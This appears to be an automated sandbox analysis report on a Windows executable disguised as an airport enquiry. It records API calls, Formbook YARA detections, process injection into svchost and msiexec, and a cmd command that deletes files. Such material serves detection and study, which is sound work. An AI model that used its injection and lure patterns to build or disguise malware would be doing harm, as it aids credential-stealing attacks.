Source: C:\Windows\explorer.exe | Code function: 2_2_0E692232 NtCreateFile, | 2_2_0E692232
Source: C:\Windows\explorer.exe | Code function: 2_2_0E693E12 NtProtectVirtualMemory, | 2_2_0E693E12
Source: C:\Windows\explorer.exe | Code function: 2_2_0E693E0A NtProtectVirtualMemory, | 2_2_0E693E0A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_009763E3 GetVersionExW,GetCurrentProcess,NtQueryInformationProcess,GetCommandLineW,GetStdHandle,GetFileType,memset,memset,RegQueryValueExW,RegCloseKey,RegQueryValueExW,RegCloseKey,CompareStringW,CompareStringW,CompareStringW,memset,GlobalFree,lstrlenW,GlobalFree,CoInitialize,CoRegisterClassObject,GetCurrentThread,OpenThreadToken,GetLastError,OpenEventW,WaitForSingleObject,CloseHandle,RevertToSelf,RegCloseKey,RegEnumKeyW,RevertToSelf,GetCurrentProcess,OpenProcessToken,GetTokenInformation,EqualSid,CloseHandle,GetLastError,memset,CloseHandle,MakeAbsoluteSD,GetLastError,CloseHandle,CloseHandle,CreateEventW,CloseHandle,CreateEventW,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,CloseHandle,GetLastError,CloseHandle,CloseHandle,CloseHandle,OpenProcess,TranslateMessage,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,CloseHandle,GetLastError,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CloseHandle,CloseHandle,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,CoRevokeClassObject,CoUninitialize,GetLastError,GetMessageW,TranslateMessage,DispatchMessageW, | 3_2_009763E3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022D10 NtMapViewOfSection,LdrInitializeThunk, | 3_2_05022D10
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022DD0 NtDelayExecution,LdrInitializeThunk, | 3_2_05022DD0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022DF0 NtQuerySystemInformation,LdrInitializeThunk, | 3_2_05022DF0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022C60 NtCreateKey,LdrInitializeThunk, | 3_2_05022C60
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022C70 NtFreeVirtualMemory,LdrInitializeThunk, | 3_2_05022C70
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022CA0 NtQueryInformationToken,LdrInitializeThunk, | 3_2_05022CA0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022F30 NtCreateSection,LdrInitializeThunk, | 3_2_05022F30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022FE0 NtCreateFile,LdrInitializeThunk, | 3_2_05022FE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 3_2_05022EA0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022B60 NtClose,LdrInitializeThunk, | 3_2_05022B60
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022AD0 NtReadFile,LdrInitializeThunk, | 3_2_05022AD0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_050235C0 NtCreateMutant,LdrInitializeThunk, | 3_2_050235C0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05024650 NtSuspendThread, | 3_2_05024650
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05024340 NtSetContextThread, | 3_2_05024340
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022D00 NtSetInformationFile, | 3_2_05022D00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022D30 NtUnmapViewOfSection, | 3_2_05022D30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 3_2_05022DB0 NtEnumerateKey, | 3_2_05022DB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022C00 NtQueryInformationProcess,3_2_05022C00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022CC0 NtQueryVirtualMemory,3_2_05022CC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022CF0 NtOpenProcess,3_2_05022CF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022F60 NtCreateProcessEx,3_2_05022F60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022F90 NtProtectVirtualMemory,3_2_05022F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022FA0 NtQuerySection,3_2_05022FA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022FB0 NtResumeThread,3_2_05022FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022E30 NtWriteVirtualMemory,3_2_05022E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022E80 NtReadVirtualMemory,3_2_05022E80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022EE0 NtQueueApcThread,3_2_05022EE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022B80 NtQueryInformationFile,3_2_05022B80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022BA0 NtEnumerateValueKey,3_2_05022BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022BE0 NtQueryValueKey,3_2_05022BE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022BF0 NtAllocateVirtualMemory,3_2_05022BF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022AB0 NtWaitForSingleObject,3_2_05022AB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05022AF0 NtWriteFile,3_2_05022AF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023010 NtOpenDirectoryObject,3_2_05023010
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023090 NtSetValueKey,3_2_05023090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023D10 NtOpenProcessToken,3_2_05023D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_05023D70 NtOpenThread,3_2_05023D70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_050239B0 NtGetContextThread,3_2_050239B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A360 NtCreateFile,3_2_0311A360
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A410 NtReadFile,3_2_0311A410
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A490 NtClose,3_2_0311A490
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A35A NtCreateFile,3_2_0311A35A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A40D NtReadFile,3_2_0311A40D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A45A NtClose,3_2_0311A45A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0311A48A NtClose,3_2_0311A48A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,3_2_04E6A036
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E69BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,3_2_04E69BAF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E6A042 NtQueryInformationProcess,3_2_04E6A042
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04E69BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,3_2_04E69BB2
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00CE40B1
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CD8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00CD8858
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CE545F
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: String function: 00CA8B40 appears 42 times
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: String function: 00C87F41 appears 35 times
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: String function: 00CA0D27 appears 70 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 030BF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03075130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 030AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0302B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03087E54 appears 107 times
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0505EA12 appears 86 times
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 04FDB970 appears 262 times
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 05037E54 appears 107 times
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 05025130 appears 58 times
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0506F290 appears 103 times
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1678566324.00000000040B3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000003.1678332913.000000000422D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.4143107748.000000000E6AA000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: New Al Maktoum International Airport Enquiry Ref #2401249.exe PID: 7428, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7456, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: msiexec.exe PID: 7504, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine Classification label: mal100.troj.evad.winEXE@8/4@14/5
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEA2D5 GetLastError,FormatMessageW,0_2_00CEA2D5
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CD8713 AdjustTokenPrivileges,CloseHandle,0_2_00CD8713
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CD8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00CD8CC3
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 3_2_00972F93 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,3_2_00972F93
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CEB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CEB59E
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CFF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00CFF121
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00CF86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00CF86D0
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Code function: 0_2_00C84FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C84FE9
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 3_2_00977DD0 StartServiceCtrlDispatcherW,GetLastError,3_2_00977DD0
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe File created: C:\Users\user\AppData\Local\Temp\aut39CA.tmp
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe ReversingLabs: Detection: 31%
          Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe Virustotal: Detection: 29%
          Source: unknown Process created: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe Section loaded: iphlpapi.dll
